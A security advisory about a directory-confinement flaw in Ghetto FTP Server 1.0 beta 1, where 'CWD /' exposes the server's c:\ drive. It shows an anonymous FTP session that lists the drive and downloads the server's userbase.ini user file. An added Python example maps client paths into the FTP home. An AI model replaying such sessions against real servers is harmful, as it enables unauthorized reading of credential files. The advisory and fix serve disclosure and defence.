COMMAND

    Ghetto FTP Server

SYSTEMS AFFECTED

    Ghetto FTP Server version 1.0 beta 1

PROBLEM

    The following is based on Hexyn/Securax Advisory #16. G6 FTP Server
    is an FTP server for Windows 9x/NT. A bug allows any user to
    change to c:\ and its subdirectories.

    When sending the command "CWD /" (or "cd /" in the default UNIX
    FTP client), Ghetto FTP will change to c:\.

        <snip>
        230 User anonymous logged in.
        Remote system type is UNIX.
        Using binary mode to transfer files.
        ftp> cd /
        250 CWD command successful.
        ftp> ls
        200 PORT command successful.
        150 Opening ASCII mode data connection for /.
        <directory listing of c:\>
        ftp> GET /Program Files/CorbaSoft/GFTPS/userbase.ini
        local: userbase.ini remote: userbase.ini
        200 PORT command successful.
        150 Opening BINARY mode data connection.
        226 Transfer complete.
        3048 bytes received in 0.214 secs (14 Kbytes/sec)
        ftp> quit
        221 Bye.

SOLUTION

    At this time, no patch is available.
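
    The confinement a server needs so that "CWD /" lands on the user's
    FTP home rather than c:\, as an added example (not code from the
    advisory or the vendor). FTP_ROOT, PathEscape and resolve_virtual
    are hypothetical names; the root directory is an assumed value.

```python
import ntpath

# Assumed per-user FTP home directory (not a value from the advisory).
FTP_ROOT = r"C:\ftproot\anonymous"

class PathEscape(Exception):
    """Raised when a client-supplied path cannot be confined to the root."""

def resolve_virtual(cwd, arg, root=FTP_ROOT):
    """Map an FTP path argument to (virtual_cwd, real_path) inside root."""
    arg = arg.replace("\\", "/")          # Windows accepts both separators
    if ":" in arg or "\x00" in arg:       # drive letters, NTFS streams, NUL
        raise PathEscape(arg)
    # A leading "/" means the *virtual* root, never the drive root.
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if stack:
                stack.pop()               # clamp at the virtual root
            continue
        # Win32 trims trailing dots and spaces, so ".. " or "..." must
        # not slip past the ".." check above.
        if part != part.rstrip(". "):
            raise PathEscape(arg)
        stack.append(part)
    real = ntpath.normpath(ntpath.join(root, *stack))
    # Defence in depth: the joined path must still be root or below it.
    root_n = ntpath.normcase(ntpath.normpath(root))
    if ntpath.commonpath([root_n, ntpath.normcase(real)]) != root_n:
        raise PathEscape(arg)
    return "/" + "/".join(stack), real

if __name__ == "__main__":
    # Constructed inputs mirroring the commands in the session above.
    for cwd, arg in [("/", "/"), ("/pub", "../../.."),
                     ("/", "/Program Files/CorbaSoft/GFTPS/userbase.ini")]:
        print(arg, "->", resolve_virtual(cwd, arg))
```

    With this mapping, the GET path from the session above resolves to a
    file under the FTP home instead of the server's own installation
    directory.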